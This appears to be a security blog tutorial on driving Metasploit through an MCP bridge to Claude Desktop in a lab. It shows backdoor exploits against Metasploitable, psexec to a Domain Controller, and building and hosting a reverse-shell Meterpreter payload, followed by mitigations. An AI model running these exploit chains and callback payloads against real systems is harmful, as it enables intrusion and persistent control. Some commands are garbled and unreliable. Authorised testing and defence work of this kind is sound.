Listen to this Post

Introduction:
The Model Context Protocol (MCP) is fundamentally reshaping how security professionals interact with offensive tooling, transforming the Metasploit Framework from a command-line arsenal into a conversational adversary. By connecting Claude Desktop to Metasploit through an MCP bridge, operators can now issue plain-English objectives—such as “scan 192.168.1.8” or “exploit port 21″—and watch as the assistant interprets, plans, and executes the corresponding actions, collapsing the friction that traditionally slows engagements. This article documents an end-to-end agentic penetration test where an AI assistant, connected to Metasploit, scans a network, selects and launches exploit modules, manages sessions, runs post-exploitation, and even builds and delivers a custom payload—first compromising a vulnerable Linux host and then pivoting to a Windows Domain Controller. Because these techniques grant real control over real systems, they must only ever run against assets you are explicitly authorised to test.
Learning Objectives:
- Objective 1: Build and configure the Metasploit MCP bridge to connect Claude Desktop with the Metasploit Framework’s RPC interface.
- Objective 2: Execute a complete agentic penetration testing workflow—from reconnaissance and vulnerability identification to exploitation, post-exploitation, and payload generation—using only natural-language commands.
- Objective 3: Analyse the security implications, limitations, and defensive strategies associated with AI-driven offensive tooling, including mitigation techniques against the specific vulnerabilities exploited.
You Should Know:
- Building the Metasploit MCP Bridge: Connecting AI to Offensive Infrastructure
Before any offensive action can be taken, the assistant must be connected to Metasploit. The bridge exposes Metasploit’s RPC interface as MCP tools—such as run_exploit, run_post_module, and list_active_sessions—making them callable through natural language.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Install the Metasploit MCP Server
The bridge itself must first be installed on the Kali attacker machine.
sudo apt install metasploitmcp
This installs the package that translates between MCP and Metasploit’s RPC.
Step 2: Start PostgreSQL and the MSF RPC Daemon
Metasploit relies on PostgreSQL for its database, and the MCP bridge communicates through the `msfrpcd` daemon.
sudo service postgresql start msfrpcd -P <your_password> -S -a 127.0.0.1 -p 55553
– -P: Sets the password for RPC authentication.
– -S: Disables SSL for local communication (use caution in production).
– -a 127.0.0.1: Binds the service to localhost only.
– -p 55553: Specifies the listening port.
Step 3: Add the Claude Desktop Repository Key
Claude Desktop is installed via APT, requiring the repository signing key.
curl -fsSL https://pkg.claude-desktop-debian.dev/KEY.gpg | sudo gpg --dearmor -o /usr/share/keyrings/claude-desktop.gpg
This imports the key so APT can verify the package’s authenticity.
Step 4: Register the Repository and Refresh APT
The repository is registered against the keyring, and the package index is updated.
echo "deb [signed-by=/usr/share/keyrings/claude-desktop.gpg arch=amd64,arm64] https://pkg.claude-desktop-debian.dev stable main" | sudo tee /etc/apt/sources.list.d/claude-desktop.list sudo apt update
This makes the Claude Desktop package available for installation.
Step 5: Install Claude Desktop
The client is then installed, providing the interface and the local MCP server manager.
sudo apt install claude-desktop
Launch the client after installation.
Step 6: Locate the MCP Configuration File
In Claude Desktop, open Settings, navigate to the Developer tab, and access Local MCP servers. Click Edit Config to open the JSON configuration file.
~/.config/Claude/claude_desktop_config.json
This file initially holds client preferences and will be edited to register the Metasploit server.
Step 7: Register the Metasploit Server
Edit the configuration file to include the `mcpServers` block. The `command` is metasploitmcp, the `transport` is stdio, and `MSF_PASSWORD` must match the password given to msfrpcd.
{
"mcpServers": {
"metasploit": {
"command": "metasploitmcp",
"args": [ "--transport", "stdio" ],
"env": {
"MSF_PASSWORD": "YourPasswordHere"
}
}
}
}
After saving, the Local MCP servers panel in Settings should list Metasploit with a green running badge, confirming the bridge is live.
- Scenario 1: Compromising the Linux Target with Natural Language
With the bridge live, the assistant is turned on the Metasploitable 2 host at 192.168.1.8, moving from reconnaissance to a root shell using only plain-language tasks. This demonstrates the core power of agentic tooling: the assistant interprets terse instructions, recalls exact module syntax, chains steps, and reports results in context.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Tasking Claude to Scan the Target
A deliberately terse task is issued—no flags, no module names. The assistant must work out the method itself.
scan 192.168.1.8
Claude reasons about its constraints, proposes alternatives, runs a scan through the connector, and returns the first open ports: FTP, SSH, Telnet, SMTP, HTTP, SMB, MySQL, and VNC.
Step 2: Requesting a Complete Port Map
When asked for a full scan, the assistant returns all 31 open ports and annotates them with security context—flagging vsftpd 2.3.4, the Samba `usermap_script` weakness, `distccd` RCE, the `ingreslock` backdoor, and an UnrealIRCd backdoor.
complete port scan
This demonstrates the assistant’s ability to not only enumerate but also intelligently interpret results.
Step 3: Exploiting the vsftpd Backdoor
The assistant maps the request to the module unix/ftp/vsftpd_234_backdoor, sets RHOSTS, and requests run_exploit. A permission gate halts execution until a human explicitly approves.
exploit port 21
On approval, the backdoor triggers and a Meterpreter session opens as `root` on metasploitable.localdomain.
Step 4: Listing Active Sessions
The foothold is confirmed using the `list_active_sessions` tool.
list_active_sessions
The tool reports one live `root` Meterpreter session, ready for post-exploitation.
Step 5: Post-Exploitation—Enumerating SMB Shares
Claude runs an SMB auxiliary module, correctly recognising `smb_enumshares` as an auxiliary rather than a post module, and returns the share list—including a world-writable `tmp` share—while noting Samba 3.0.20 is vulnerable to `usermap_script` (CVE-2007-2447).
run_post_module scanner/smb/smb_enumshares
This illustrates the assistant’s understanding of module types and its ability to provide contextual risk analysis.
Step 6: Chaining a Second Exploit—UnrealIRCd
Directed at another flagged service, the assistant launches `unix/irc/unreal_ircd_3281_backdoor` and creates a second session—demonstrating multi-exploit chaining.
run exploit on port 6667
The assistant candidly notes a session-persistence quirk in the RPC layer, showcasing transparent fallback and reasoning.
Step 7: Consolidating the Foothold
The two existing footholds on the Linux host are confirmed: a root Meterpreter session via vsftpd and a command shell via UnrealIRCd—a stable base from which to pivot.
list_active_sessions
This confirms the sessions are active and ready for lateral movement.
- Scenario 2: Pivoting to the Windows Domain Controller
With the Linux host owned, the focus shifts to the prize of the lab—the Windows Domain Controller at 192.168.1.11—driving the assistant from reconnaissance to a standing SYSTEM session.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Scanning the Domain Controller
Pointed at 192.168.1.11, the assistant returns the open ports and classifies them: Kerberos (88, 464), LDAP (389, 636), SMB (445), DNS (53), and RPC—the classic signature of a Windows Domain Controller.
port scan 192.168.1.11
Step 2: Surveying SMB Exploits
Asked for SMB exploits on port 445, the assistant lists EternalBlue, MS08-067, SMBGhost, and others, flagging credential-based `windows/smb/psexec` as the cleanest path—because valid administrator credentials are already held for this lab.
list_exploits windows port 445
This highlights the assistant’s ability to recommend context-appropriate modules.
Step 3: Supplying the Target and Credentials
The assistant gathers parameters interactively rather than guessing. It first asks for `RHOSTS` (the Domain Controller at 192.168.1.11) and then requests SMB credentials.
RHOSTS → 192.168.1.11 SMBUser: administrator SMBPass: <password>
Because `psexec` authenticates rather than exploiting a memory bug, it needs a valid account.
Step 4: Gaining a SYSTEM Session
The assistant runs psexec, and a session opens—a `windows/meterpreter/reverse_tcp` payload on the Domain Controller. Running `sysinfo` confirms the privilege level:
sysinfo
The result is `NT AUTHORITY\SYSTEM` on a machine named DC—the highest privilege on the host.
Step 5: Surveying Post-Exploitation Modules
The assistant is asked which post modules are worth running. It groups the most useful Windows modules by purpose: gather/recon (hashdump, enum_shares, credential_collector), privilege escalation, and persistence.
list post module
This demonstrates the assistant’s ability to provide structured, actionable intelligence.
Step 6: Enumerating Domain Controller Shares
A post module is run to enumerate shares. When a post module needs a session that has since dropped, the assistant explains the timeout and offers the exact console sequence to re-establish it—a transparent fallback that keeps the operator in control.
run post/windows/gather/enum_shares
An SMB share enumeration returns ADMIN$, C$, IPC$, and the tell-tale `NETLOGON` and SYSVOL—confirming a standard, clean Domain Controller.
- Scenario 3: Generating and Delivering a Custom Payload
Beyond live exploitation, the assistant can build a standalone payload, demonstrating a complete end-to-end capability from reconnaissance to persistent access.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Invoke Payload Generation
The `generate_payload` tool is invoked, and `windows/meterpreter/reverse_tcp` is selected as the payload type.
generate_payload
The assistant prompts for the output format: exe, ps1, dll, or raw. A standalone Windows executable is chosen.
Step 2: Setting Listener Parameters
A reverse payload must know where to call back. The assistant prompts for `LHOST` and LPORT.
LHOST → 192.168.1.17 LPORT → 443
Port 443 is chosen because it blends with HTTPS and is rarely blocked outbound.
Step 3: Generating the Payload
The assistant produces the executable and reports the result: a 7,168-byte file under `/home/kali/payloads/` with the embedded `LHOST` and LPORT, and a reminder to start a listener first.
Step 4: Hosting the Payload
To deliver the file, a terminal is used to confirm the executable and serve it over HTTP.
cd payloads ls -al python3 -m http.server
The log line shows the Domain Controller at `192.168.1.11` downloading it.
Step 5: Starting the Handler
Back in the assistant, the matching listener is started with start_listener. Claude requests the action—specifying the payload, lhost, and lport 443—and the permission gate again requires explicit approval.
start_listener
Step 6: Confirming the Session
When the delivered executable runs, it calls back and a fresh Meterpreter session appears—from `192.168.1.11` as IGNITE\administrator @ DC, over the `192.168.1.17:443` listener.
list_active_sessions
The full chain, from scan to standing access, was driven entirely by conversation.
5. Mitigation Strategies: Breaking the Attack Chain
Every weakness exploited in this engagement is well understood and entirely defensible. The following strategies break the chain at multiple points, preventing an attacker from reproducing the outcome.
Step‑by‑step guide explaining what this does and how to use it:
1. Patch and Retire Legacy Services
Software like vsftpd 2.3.4, UnrealIRCd, and `Samba 3.0.x` is long past end-of-life and should be patched or retired outright; any service that isn’t actively needed should be removed entirely.
On Linux: Check for and remove unnecessary services sudo systemctl stop vsftpd sudo apt-get remove --purge vsftpd
Backing this up with continuous vulnerability management ensures known-bad versions are caught as they reappear.
- Reduce Attack Surface through Network Segmentation and Firewalling
A single compromised machine must not be able to freely reach everything else. Apply strict ingress and egress firewall rules and close every port that doesn’t serve a documented, justified purpose.On Linux: Use iptables to restrict inbound traffic sudo iptables -A INPUT -p tcp --dport 21 -j DROP Block FTP sudo iptables -A INPUT -p tcp --dport 6667 -j DROP Block IRC
On Windows: Use New-1etFirewallRule to block ports New-1etFirewallRule -DisplayName "Block Port 445" -Direction Inbound -LocalPort 445 -Protocol TCP -Action Block
3. Strengthen Identity and Credential Hygiene
The most damaging step was credential-based lateral movement via psexec. Enforce strong, unique passwords and adopt a tiered-administration model so high-privilege credentials are never exposed on lower-trust systems. Deploy LAPS to manage local administrator passwords and restrict which accounts are permitted to authenticate to domain controllers.
Enforce password policy via Group Policy Set minimum password length, complexity, and age
4. Secure SMB and File Shares
Require SMB signing, disable the obsolete SMBv1 protocol, remove world-writable shares, and apply least privilege to all share permissions.
Disable SMBv1 Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force Require SMB Signing Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
5. Disrupt Payload Delivery and Reverse Shells
Endpoint detection and response with behavioural analytics, application allow-listing, and blocking of unsigned binaries all raise the cost of execution. Alert on anomalous outbound connections, including traffic riding on port 443, where malicious call-backs often hide in plain sight.
On Linux: Use auditd to monitor outbound connections on port 443 sudo auditctl -a always,exit -F arch=b64 -S connect -k outbound_443
- Keep a Human in the Loop for Agentic Tooling
Defensively, organisations should keep a human in the loop as an approval gate rather than letting an agent act autonomously, log and audit every MCP tool call, and restrict which connectors are enabled. Agent output should be treated as untrusted by default. The same automation that powers offensive testing can be turned toward the blue team to drive detection engineering and continuous validation.
What Undercode Say:
- Key Takeaway 1: Agentic AI tooling compresses an entire penetration testing engagement into a conversation, drastically lowering the skill floor for offensive operations while simultaneously providing defenders with powerful automation capabilities.
-
Key Takeaway 2: The MCP bridge between Claude Desktop and Metasploit is a paradigm shift—it transforms a complex, command-line-driven framework into an intuitive, natural-language-powered adversary that can scan, exploit, pivot, and generate payloads with minimal human intervention.
Analysis:
The demonstration showcases that AI is not merely a passive copilot but an active agent capable of orchestrating complex attack chains. The assistant’s ability to interpret terse commands, recall exact module syntax, and chain multiple exploits—from `vsftpd` backdoor to UnrealIRCd to psexec—illustrates a level of operational fluency that rivals experienced human operators. However, the permission gate remains critical; every offensive step requires explicit human approval, ensuring accountability and preventing autonomous malicious activity. The assistant’s transparent fallback mechanisms—such as explaining session timeouts and offering reconnection sequences—further reinforce that this is a collaborative tool, not a replacement for human judgment. The most profound insight is that the same integration can be inverted for defence: automated detection engineering, continuous validation, and reporting can all benefit from the same agentic capabilities. The advantage will go to whoever adopts it more deliberately, with a human firmly in the loop.
Prediction:
+1 The integration of AI with offensive security tooling like Metasploit will accelerate the democratisation of penetration testing, enabling smaller security teams to conduct sophisticated assessments that were previously resource-prohibitive.
+1 Agentic AI will become a standard component of red team operations within 2–3 years, with custom MCP servers developed for every major security framework, from Cobalt Strike to BloodHound.
-1 The lowered skill floor for offensive operations will inevitably be exploited by malicious actors, leading to a surge in AI-driven automated attacks that will outpace traditional signature-based detection.
-1 Organisations that fail to adopt defensive AI—using the same agentic capabilities for detection engineering and continuous validation—will face a widening capability gap against adversaries who do.
+1 The permission-gate model, requiring human approval for every offensive action, will become the industry standard for AI-assisted security tools, ensuring accountability and preventing autonomous malicious activity.
-1 Legacy systems and unpatched vulnerabilities will become even more attractive targets as AI agents can rapidly identify and chain exploits, increasing the urgency for comprehensive patch management.
+1 The same MCP-based integration will revolutionise defensive operations, with AI agents autonomously validating security controls, generating detection rules, and performing continuous compliance checks.
-1 The reliance on natural-language interfaces may introduce new attack surfaces, such as prompt injection attacks that could manipulate AI assistants into executing unintended actions, necessitating robust input sanitisation and context isolation.
+1 AI-powered penetration testing will shift the industry focus from “how” to exploit to “what” to exploit, with human operators spending more time on strategic decision-making and less on rote command execution.
+1 The convergence of AI and offensive security will ultimately strengthen the overall security posture, as defenders can leverage the same automation to identify and remediate vulnerabilities faster than ever before.
▶️ Related Video (86% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Yashika Dhir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


